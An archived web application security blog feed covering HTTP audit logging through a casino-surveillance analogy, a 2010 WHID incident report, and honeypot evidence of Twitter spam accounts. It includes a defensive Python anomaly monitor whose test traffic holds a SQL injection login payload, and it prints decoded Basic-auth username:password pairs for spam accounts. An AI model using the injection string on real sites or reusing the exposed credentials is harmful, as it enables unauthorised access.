<br /><b>Web Application Security and Casino Surveillance</b></div><div>Web application security and monitoring, on the other hand, is very similar to Casino Surveillance: the goal is not to keep the bad guys out, because <span style="font-weight: bold;">you have to let the people play.</span> The very nature of both a Casino and a web application is to give people access to the resources. The issue is not so much <b><i>who you are</i></b> but rather <b><i>what you are doing</i></b>. Yes, Casinos have security, but they are not guarding the front door and checking IDs. They have to let people in to play the various games, and then they watch them very closely, looking for abnormal behavior. While the operating models are similar, there is a stark contrast in monitoring capabilities: the overwhelming majority of web applications have not been properly instrumented to log transactional data and alert on suspicious behavior. This is where, I believe, web applications could learn a lesson or two from Casinos.</div><div>
<br /></div><div><meta charset="utf-8"><span style="font-weight: bold; ">Surveillance is not a luxury</span>
<br />Implementation of proper surveillance inside a Casino is not a luxury but is actually mandated by law (example: <a href="http://gaming.nv.gov/stats_regs/reg5_survel_stnds.pdf">Nevada Gaming Commission document on surveillance standards</a>). While the <a href="https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf">PCI Data Security Standard (DSS)</a> does outline some audit details in Requirement 10, it still falls short on the specific items that should be logged and/or flagged in web transactions. The <a href="https://www.owasp.org/index.php/Category:OWASP_AppSensor_Project">OWASP AppSensor Project</a> is the closest resource I have found that highlights the types of events web applications should be logging and alerting on. As good as AppSensor is at describing the types of events to look for, it does not cover HTTP auditing itself.</div><div>
<br /></div><div><meta charset="utf-8"><span style="font-weight: bold; ">Proper Coverage</span>
<br />Casino surveillance cameras must be able to observe all aspects of the games including the equipment, staff and players. This includes the table layouts, the rack, chips and even view player's faces. Here is one section that outlines exactly what parts of table games must be covered for surveillance purposes:</div><div>
<br /></div><div><blockquote><div><i><b>STANDARD 2 </b></i></div><div><i><b>REQUIRED SURVEILLANCE COVERAGE: TABLE GAMES </b></i></div><div><i>1. The surveillance system of all licensees operating three (3) or more table games must possess the capability to monitor and record: </i></div><div><i>(a) Each table game area, with sufficient clarity to identify patrons and dealers; and </i></div><div><i>(b) Each table game surface, with sufficient coverage and clarity to simultaneously view the table bank and determine the configuration of wagers, card values and game outcome. </i></div><div><i>2. Each progressive table game with a potential progressive jackpot of $25,000 or more must be recorded and monitored by dedicated cameras that provide coverage of: </i></div><div><i>(a) The table surface, sufficient that the card values and card suits can be clearly identified; and </i></div><div><i>(b) An overall view of the entire table with sufficient clarity to identify patrons and dealer. </i></div><div><i>(c) A view of the progressive meter jackpot amount. If several tables are linked to the same progressive jackpot meter, only one meter need be recorded.</i></div></blockquote></div><div>In typical web application security logging, only a small subset of the data is actually logged or reviewed. The data captured by most web servers is not adequate for conducting incident response. For example, in most cases request and response bodies are excluded from logging, which leaves a gaping blind spot: a SQL Injection payload in a POST body never appears in a standard access log at all. Anton Chuvakin and Gunnar Peterson have a very good paper entitled "<a href="http://arctecgroup.net/pdf/howtoapplogging.pdf">How to do Application Logging Right</a>" that is certainly worth a read.</div><div>
<br /><span style="font-weight: bold;">Combination of recording and live analysis</span>
<br />Casino cameras record all data and this information is stored for later use such as settling game disputes. If there are any problems, they can review the tapes to identify what happened. In addition to the recorded data, all Casinos have staff who are constantly monitoring and moving cameras to zero in on suspicious activity. In web application security monitoring, this is similar to having alerting systems based on rules such as those in AppSensor and then supplementing that with full audit logging. When an analyst identifies an initial event of interest, they can then utilize the full HTTP audit log data for correlations.<b>
<br /></b>
<br /><span style="font-weight: bold;">Just Doesn't Look Right (JDLR)</span>
<br />Strict adherence to procedures in Casinos is critical for identifying scams and cheating. When staff or players deviate from these procedures, something just doesn't look right (JDLR) and the surveillance staff can call up increased camera coverage to focus in on the suspects. This is similar to web application firewalls that use automated learning/profiling to create positive security rules describing the expected behavior of the application. When a client deviates from this profile, anomaly events are generated; the audit logging can then be increased and the client's actions "tagged" so that its traffic is recorded in full.
<br />
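<div>To make the three ideas above concrete (full transaction recording, live analysis against a learned profile, and tagging a client so its later traffic is kept in full), here is an added example in Python. It is not code from the original post, not ModSecurity or AppSensor code, and every host, path, parameter and client address in it is constructed for illustration. The profile learning is a deliberately small version of what a WAF's positive security model does: for each method and path it records which parameters were seen, how long their values were, and what character class they fell into.</div>

```python
# Added example (not from the original post): toy AppSensor/WAF-style transaction monitor.
# Hosts, paths, parameters and client addresses below are constructed for illustration.
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import parse_qs


@dataclass
class Transaction:
    """One HTTP transaction as a full audit logger would capture it (request body included)."""
    client: str
    method: str
    uri: str           # path, optionally with a query string
    body: str = ""     # form-encoded request body; empty for GET

    def params(self):
        """Return (path, merged parameters) from query string and body, like ARGS in ModSecurity."""
        path, _, query = self.uri.partition("?")
        merged = {}
        for raw in (query, self.body):
            for name, values in parse_qs(raw, keep_blank_values=True).items():
                merged[name] = values[0]
        return path, merged


# Value classes from narrowest to widest; a learned class may only widen during training.
CLASS_PATTERNS = [("digits", re.compile(r"^[0-9]+$")),
                  ("alnum", re.compile(r"^[A-Za-z0-9_.@-]+$"))]
RANK = {"digits": 0, "alnum": 1, "free": 2}


def classify(value):
    for name, pattern in CLASS_PATTERNS:
        if pattern.match(value):
            return name
    return "free"


def learn_profile(transactions):
    """Positive security model: per (method, path), the parameters seen and their shape."""
    profile = defaultdict(dict)
    for tx in transactions:
        path, params = tx.params()
        resource = profile[(tx.method, path)]
        for name, value in params.items():
            entry = resource.setdefault(name, {"maxlen": 0, "class": "digits"})
            entry["maxlen"] = max(entry["maxlen"], len(value))
            if RANK[classify(value)] > RANK[entry["class"]]:
                entry["class"] = classify(value)
    return profile


def check_transaction(profile, tx, slack=2.0):
    """JDLR check: list every way this transaction deviates from the learned profile."""
    path, params = tx.params()
    expected = profile.get((tx.method, path))
    if expected is None:
        return [f"unknown resource {tx.method} {path}"]
    anomalies = []
    for name, value in params.items():
        if name not in expected:
            anomalies.append(f"unexpected parameter {name!r}")
            continue
        if len(value) > expected[name]["maxlen"] * slack:
            anomalies.append(f"{name!r} length {len(value)} exceeds learned maximum {expected[name]['maxlen']}")
        if RANK[classify(value)] > RANK[expected[name]["class"]]:
            anomalies.append(f"{name!r} value {value!r} outside learned class {expected[name]['class']}")
    return anomalies


def monitor(profile, live):
    """Live analysis: alert on anomalies, tag the offending client, and keep every later
    transaction from a tagged client in full (body included) for correlation."""
    alerts, tagged, audit = [], set(), []
    for tx in live:
        anomalies = check_transaction(profile, tx)
        if anomalies:
            alerts.append((tx.client, tx.method, tx.uri, anomalies))
            tagged.add(tx.client)
        if tx.client in tagged:
            audit.append(f"{tx.client} {tx.method} {tx.uri} body={tx.body!r}")
        else:
            # Untagged traffic keeps only the request line, as a typical access log would.
            audit.append(f"{tx.client} {tx.method} {tx.uri}")
    return alerts, tagged, audit


# Constructed training traffic: the "normal game" the profile is learned from.
BASELINE = [
    Transaction("203.0.113.5", "POST", "/login", "user=alice&pass=s3cret"),
    Transaction("203.0.113.6", "POST", "/login", "user=bob&pass=hunter2"),
    Transaction("203.0.113.9", "POST", "/login", "user=carol.w&pass=Pa55word"),
    Transaction("203.0.113.7", "GET", "/account?id=1042"),
    Transaction("203.0.113.8", "GET", "/account?id=77"),
]

# Constructed live traffic: one legitimate login, then three clients that just don't look right.
LIVE = [
    Transaction("203.0.113.5", "POST", "/login", "user=alice&pass=s3cret"),
    Transaction("198.51.100.7", "POST", "/login", "user=bob' OR '1'='1&pass=x"),  # SQLi in the body
    Transaction("198.51.100.7", "GET", "/account?id=1042"),   # benign, but this client is now tagged
    Transaction("198.51.100.8", "GET", "/account?id=1042&debug=1"),  # parameter never seen in training
    Transaction("198.51.100.9", "GET", "/admin"),                    # resource never seen in training
]

if __name__ == "__main__":
    for client, method, uri, why in monitor(learn_profile(BASELINE), LIVE)[0]:
        print(f"ALERT {client} {method} {uri}: {'; '.join(why)}")
```

<div>Running the file prints one alert per deviating client. Note that the first alert is raised only because the monitor sees the POST body: the request line for that transaction is a perfectly ordinary <code>POST /login</code>, which is exactly the blind spot a request-line-only access log leaves. Once a client is tagged, its subsequent benign-looking <code>GET /account</code> is retained with its body as well, so an analyst has the full transaction to correlate later. A real WAF profile would also learn value lengths and classes per parameter with far more samples and tolerate drift; the <code>slack</code> factor here stands in for that.</div>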
<br /><span style="font-weight: bold;">Two Types of Crimes</span>
<br />Casinos typically see two types of crimes: crimes against the casino and crimes against the patrons. Crimes against the casino might involve scam artists working in teams to distract staff and pass cards between themselves, or possibly using tools/electronics against the computerized slot machines. In web application security, these are similar to SQL Injection types of attacks, where the attacker targets the application itself to steal data.
<br />
<br />Casino crimes against the patrons are scenarios where cheaters try to snatch other players' chips and the like. In webappsec, these are similar to XSS/CSRF types of attacks, which target the end user through the web application.
<br /></div><div>
<br /></div><div><meta charset="utf-8"><span style="font-weight: bold; ">Anyone can be a cheat</span>
<br />It would be foolhardy to focus only on stereotypes when attempting to identify cheats. Cheats come in all shapes, sizes and ages. Once again, it is not who you are but what you are doing. Similarly, in webappsec, while there is some useful IP reputation data that can be applied, you must actually review what the web transaction is doing in order to identify possible malicious behavior.</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-5645569839667192010-09-09T09:56:00.006-04:002010-09-22T14:51:20.330-04:00WASC WHID Semi-Annual Report for 2010<span class="Apple-style-span" style="font-family: 'Segoe UI', 'Lucida Grande', Arial; color: rgb(68, 68, 68); font-size: 13px; line-height: 19px; "><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "><span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.2em; color: rgb(51, 51, 51); ">The Web Hacking Incident Database (WHID) is a project dedicated to maintaining a record of web application-related security incidents. 
WHID’s purpose is to serve as a tool for raising awareness of web application security problems and to provide information for statistical analysis of web application security incidents. Unlike other resources covering web site security – which focus on the technical aspect of the incident – the WHID focuses on the impact of the attack. Trustwave's SpiderLabs is a WHID project contributor.</span>
<br />
<br /></p><h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: bold; font-style: inherit; font-size: 20px; font-family: 'Segoe UI', 'Lucida Grande', Arial, sans-serif; vertical-align: baseline; line-height: 1.25em; color: rgb(68, 68, 68); ">Report Summary Findings</h1><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">An analysis of the Web hacking incidents from the first half of 2010 performed by Trustwave’s SpiderLabs Security Research team shows the following trends and findings:</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "> </p><ul style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 3em; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; 
"><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">A steep rise in attacks against the financial vertical market is occurring in 2010, and is currently the no. 3 targeted vertical at 12 percent. This is mainly a result of cybercriminals targeting small to medium businesses’ (SMBs) online banking accounts.</li><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">Corresponding to cybercriminals targeting online bank accounts, the use of Banking Trojans (which results in stolen authentication credentials) made the largest jump for attack methods (Banking Trojans + Stolen Credentials).</li><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">Application downtime, often due to denial of service attacks, is a rising outcome.</li><li style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; 
border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; ">Organizations have not implemented proper Web application logging mechanisms and thus are unable to conduct proper incident response to identify and correct vulnerabilities. This resulted in the no. 1 “unknown” attack category.</li></ul><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "> </p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">
<br /></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-style: inherit; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "><span class="Apple-style-span" style="font-size: large;"><b>WHID Top 10 Risks for 2010</b></span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">As part of the WHID analysis, here is a current Top 10 listing of the <a href="http://projects.webappsec.org/Threat-Classification">application weaknesses</a> that are actively being exploited (with example attack method mapping in parentheses). Hopefully this data can be used by organizations to re-prioritize their remediation efforts.</p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">
<br /></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; "><!--StartFragment--> <table border="1" cellpadding="4" cellspacing="0" style="border-collapse: collapse;"> <thead><tr><th>#</th><th>WHID Top 10 for 2010</th></tr></thead> <tbody> <tr><td><b>1</b></td><td><b>Improper Output Handling (XSS and Planting of Malware)</b></td></tr> <tr><td><b>2</b></td><td><b>Insufficient Anti-Automation (Brute Force and DoS)</b></td></tr> <tr><td><b>3</b></td><td><b>Improper Input Handling (SQL Injection)</b></td></tr> <tr><td><b>4</b></td><td><b>Insufficient Authentication (Stolen Credentials/Banking Trojans)</b></td></tr> <tr><td><b>5</b></td><td><b>Application Misconfiguration (Detailed error messages)</b></td></tr> <tr><td><b>6</b></td><td><b>Insufficient Process Validation (CSRF and DNS Hijacking)</b></td></tr> <tr><td><b>7</b></td><td><b>Insufficient Authorization (Predictable Resource Location/Forceful Browsing)</b></td></tr> <tr><td><b>8</b></td><td><b>Abuse of Functionality (CSRF/Click-Fraud)</b></td></tr> <tr><td><b>9</b></td><td><b>Insufficient Password Recovery (Brute Force)</b></td></tr> <tr><td><b>10</b></td><td><b>Improper Filesystem Permissions (Information Leakage)</b></td></tr> </tbody></table> 
<!--EndFragment--></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">
<br /></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; font-weight: inherit; font-style: inherit; font-size: 13px; font-family: inherit; vertical-align: baseline; line-height: 1.5em; ">Download the <a href="http://projects.webappsec.org/f/WHIDWhitePaper_WASC.pdf">full report</a>.</p></span>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-8135297892485492002010-07-12T15:19:00.002-04:002010-07-12T15:30:30.821-04:00Moving to the Trustwave SpiderLabs Research Team<i>Submitted by Ryan Barnett 07/12/2010</i><div>
<br /></div><div>As you may have heard, <a href="https://www.trustwave.com/pressReleases.php?n=062210&hp=1">Trustwave has acquired Breach Security</a>! As part of this move, I am excited to announce that I have now joined the Trustwave <a href="https://www.trustwave.com/spiderLabs.php">SpiderLabs Research Team</a>. I am extremely excited to join such a great group of people and to contribute to the team. As part of my job, I will be focusing more time on updating signatures for Trustwave's WAF products (which include both the open source ModSecurity and WebDefend). I will also be making more updates to the <a href="http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project">OWASP ModSecurity Core Rule Set</a> (CRS).</div><div>
<br /></div><div>Speaking of the CRS, if anyone is going to be out at Blackhat in Las Vegas at the end of the month, please try and come by the <a href="http://www.blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html">Arsenal Event</a> on Thursday morning as I will be presenting the ModSecurity CRS and the <a href="http://www.modsecurity.org/demo/">Demo page</a> at Kiosk #3.</div><div>
<br /></div><div>Hope to see you all there!</div><meta equiv="content-type" content="text/html; charset=utf-8">Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-58381851337968822792010-06-21T13:21:00.003-04:002010-06-21T14:35:23.025-04:00Spammers using Twitter's Update Status API<i>Submitted by Ryan Barnett 06/21/2010</i><div><br /></div><div>I was reviewing the logs over at our <a href="http://projects.webappsec.org/Distributed-Open-Proxy-Honeypots">WASC Distributed Open Proxy Honeypot Project</a> and I noticed some interesting traffic. It looks as though Spammers are using the Twitter API to post their messages to their fake accounts. While the news of Spammers doing this is not new, the WASC honeypots are able to take a different vantage point and correlate account data.</div><div><br /></div><div>Here is one example Spam posting transaction: </div><div><br /></div><div><br /></div><div><span class="Apple-style-span" style=" color: rgb(51, 51, 51); line-height: 13px; font-family:Arial, Helvetica, Geneva, sans-serif;font-size:12px;"><div class="border" style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(216, 216, 216); border-right-color: rgb(216, 216, 216); border-bottom-color: rgb(216, 216, 216); border-left-color: rgb(216, 216, 216); width: 925px; overflow-x: auto; "><table id="summaryTable" cellpadding="0" cellspacing="0" style="width: 924px; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(255, 255, 255); border-left-width: 1px; border-left-style: solid; border-left-color: rgb(255, 255, 255); "><tbody><tr><td style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; "><span 
class="httpHeader" style="font: normal normal bold 14px/16px Arial, Helvetica, Geneva, sans-serif; font-weight: bold; padding-top: 2px; padding-bottom: 2px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(239, 243, 252); display: block; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(240, 240, 240); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(240, 240, 240); background-position: initial initial; background-repeat: initial initial; ">Request Headers</span></td></tr><tr><td class="contentCellPre" style="font: normal normal normal 12px/16px 'Courier New', Courier; padding-top: 3px; padding-right: 8px; padding-bottom: 3px; padding-left: 8px; white-space: wrap; "><span class="httpFirstLine" style="font-weight: bold; color: rgb(68, 68, 68); padding-top: 2px; padding-bottom: 2px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 253, 238); display: block; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(240, 240, 240); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(240, 240, 240); background-position: initial initial; background-repeat: initial initial; ">POST http://twitter.com/statuses/update.xml HTTP/1.1</span><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Authorization:</span> Basic Sm9oblRNYWxtOm5rdGpjcjEyMw==<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">X-Twitter-Client-URL:</span> http://yusuke.homeip.net/twitter4j/en/twitter4j-2.0.8.xml<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Accept-Encoding:</span> gzip<br /><span 
class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: nowrap; color: rgb(68, 68, 68); ">User-Agent:</span> twitter4j http://yusuke.homeip.net/twitter4j/ /2.0.8<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">X-Twitter-Client-Version:</span> 2.0.8<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Content-Type:</span> application/x-www-form-urlencoded<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Content-Length:</span> 161<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Host:</span> twitter.com<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Accept:</span> text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br /><span class="hName" style="font: normal normal bold 12px/16px 'Courier New', Courier; white-space: wrap; color: rgb(68, 68, 68); ">Proxy-Connection:</span> keep-alive<br /></td></tr></tbody></table></div><br /><div class="border" style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(216, 216, 216); border-right-color: rgb(216, 216, 216); border-bottom-color: rgb(216, 216, 216); border-left-color: rgb(216, 216, 216); width: 925px; overflow-x: auto; "><table id="summaryTable" cellpadding="0" cellspacing="0" style="width: 924px; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(255, 255, 255); border-left-width: 1px; 
border-left-style: solid; border-left-color: rgb(255, 255, 255); "><tbody><tr><td style="font: normal normal normal 12px/13px Arial, Helvetica, Geneva, sans-serif; "><span class="httpHeader" style="font: normal normal bold 14px/16px Arial, Helvetica, Geneva, sans-serif; font-weight: bold; padding-top: 2px; padding-bottom: 2px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(239, 243, 252); display: block; border-top-width: 1px; border-top-style: solid; border-top-color: rgb(240, 240, 240); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(240, 240, 240); background-position: initial initial; background-repeat: initial initial; ">Request Body</span></td></tr><tr><td class="contentCellPre" style="font: normal normal normal 12px/16px 'Courier New', Courier; padding-top: 3px; padding-right: 8px; padding-bottom: 3px; padding-left: 8px; white-space: wrap; ">status=%40ldegelund+why+not+offer+work-from-home+projects++to+your+readers+by+th <span class="grayText" style=" ;color:gray;">\</span><br />is+terrific+service+-+http%3A%2F%2Fproj.li%2FaOGdjN+Good+Luck%21&source=Twitter4 <span class="grayText" style=" ;color:gray;">\</span><br />J</td></tr></tbody></table></div></span></div><div><br /></div><div>Notice the Authorization request header as the Twitter API requires basic authentication. The decoded user credentials are (format is username:password):</div><div><blockquote><span class="Apple-style-span" style="font-family:'courier new';">JohnTMalm:nktjcr123</span></blockquote></div><div>Now, looking at this one transaction in isolation doesn't yield much interesting data. What is interesting, however, is that I then did a search for all transactions to Twitter's API for June 21, 2010 and I found many more transactions all from different client IP addresses. 
I extracted out all of the unique Authorization headers and decoded them:</div><div><div></div><blockquote><div><span class="Apple-style-span" style="font-family:'courier new';">JohnTMalm:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">NicholeFBethune:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">LindaCTomas:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">ElsieJJanu:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">PhyllisLMoor:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">CynthiaLMille:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">JaniceRKnudson:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">harli_lona:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">MaryCShahh:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">DorothyRFrame:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">jeffpadams:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">AmyMSiege:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">LynJLaw:nktjcr123</span></div><div><span class="Apple-style-span" style="font-family:'courier new';">SteveMWesle:nktjcr123</span></div></blockquote><div></div></div><div>Notice anything interesting? They all have the exact same password. 
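The two techniques in this post, correlating proxied requests by their decoded Basic credentials and the registration-time password-popularity check recommended below, as one added Python example that is not part of the original post. The log records, account names, passwords and pepper value are constructed for illustration; using a keyed (HMAC) hash for the tracking list is my choice, not something the post specifies.

```python
import base64
import hashlib
import hmac
import re
from collections import defaultdict


def _basic(userpass: str) -> str:
    """Build a Basic Authorization header value from 'user:password'."""
    return "Basic " + base64.b64encode(userpass.encode()).decode()


# Constructed sample of proxy-honeypot request records (not real log data):
# "client_ip METHOD URL | Authorization: <value>", one request per line.
# Usernames and passwords are made up; four accounts share one password.
SAMPLE_LOG = "\n".join([
    f"10.0.0.11 POST http://twitter.com/statuses/update.xml | Authorization: {_basic('AliceRoe:rspz318')}",
    f"10.0.0.12 POST http://twitter.com/statuses/update.xml | Authorization: {_basic('BobTGrey:rspz318')}",
    f"10.0.0.13 POST http://twitter.com/statuses/update.xml | Authorization: {_basic('CaraMLee:rspz318')}",
    f"10.0.0.14 POST http://twitter.com/statuses/update.xml | Authorization: {_basic('DanQHill:rspz318')}",
    f"10.0.0.14 POST http://twitter.com/statuses/update.xml | Authorization: {_basic('DanQHill:rspz318')}",
    f"10.0.0.20 POST http://twitter.com/statuses/update.xml | Authorization: {_basic('real_user:unique-pass-77')}",
    "10.0.0.21 POST http://twitter.com/statuses/update.xml | Authorization: Basic ???notbase64???",
    "10.0.0.22 GET http://twitter.com/statuses/public_timeline.xml | -",
])

AUTH_RE = re.compile(r"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)")


def decode_basic(token: str):
    """Decode a Basic token to (user, password), or None if it is malformed."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
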